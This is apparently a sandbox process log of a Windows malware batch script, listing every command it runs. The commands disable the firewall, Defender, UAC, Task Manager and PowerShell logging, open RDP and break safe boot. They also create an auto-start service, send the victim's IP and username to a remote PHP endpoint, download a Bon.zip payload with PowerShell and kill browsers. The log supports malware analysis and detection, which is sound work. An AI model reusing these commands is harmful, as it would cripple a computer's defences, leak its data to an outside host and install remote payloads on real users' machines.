powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:2056

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:1176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:408

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:2168

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2620

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:5056

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:4328

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:1284

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:2692

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:3500

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:3968

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:2712

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:2956

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:3996

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:4276

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:2328

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4804

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:4896

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:5108

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:2100

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1528

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4860

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4288

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2176

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:4340

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:2652

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:3972

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:2604

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:3124

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:448

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:4544

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:4080

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:3988

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:552

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:4740

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:816

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:380

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.1.23
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f4718
3⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
3⤵
PID:2100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
3⤵
PID:4224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
3⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
3⤵
PID:3020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
3⤵
PID:5328

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
3⤵
PID:5768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
3⤵
PID:5820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
3⤵
PID:5952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
3⤵
PID:5992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
3⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
3⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
3⤵
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5060

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
2⤵
PID:5628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f4718
3⤵
PID:5644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=fzbxdxua\admin
2⤵
PID:5688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f4718
3⤵
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:5756

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:5828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:5848

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5928

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5944

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5960

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:6000

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:6020

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:6036

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:6056

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:6124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:6140

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5636

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
2⤵
PID:5328

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
3⤵
PID:6036

C:\Windows\system32\find.exe
find "BackupProductKeyDefault"
3⤵
PID:5336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:1536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f4718
3⤵
PID:6052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'Bon.zip' -DestinationPath '.'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5312

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3596

C:\Windows\system32\timeout.exe
timeout /t 300 /nobreak
2⤵
- Delays execution with timeout.exe
PID:5588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Modifies data under HKEY_USERS
PID:3640

C:\Windows\system32\net.exe
net session
2⤵
PID:5168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5252

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5304

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5328

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:5708

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:5856

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:5976

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5296

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5260

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:5636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:5780

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:5792

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:1536

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:6052

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:6116

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:5444

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:3812

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
- Modifies data under HKEY_USERS
PID:960

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:5696

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5948

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5568

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5168

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
- Modifies data under HKEY_USERS
PID:5984

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:6084

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:1352

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5304

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3228

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5636

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5940

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5832

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5564

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5168

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:6068

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5824

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:5264

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:2880

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:4480

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:960

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
- Modifies data under HKEY_USERS
PID:1484

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
PID:5572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5228

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:6112

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5984

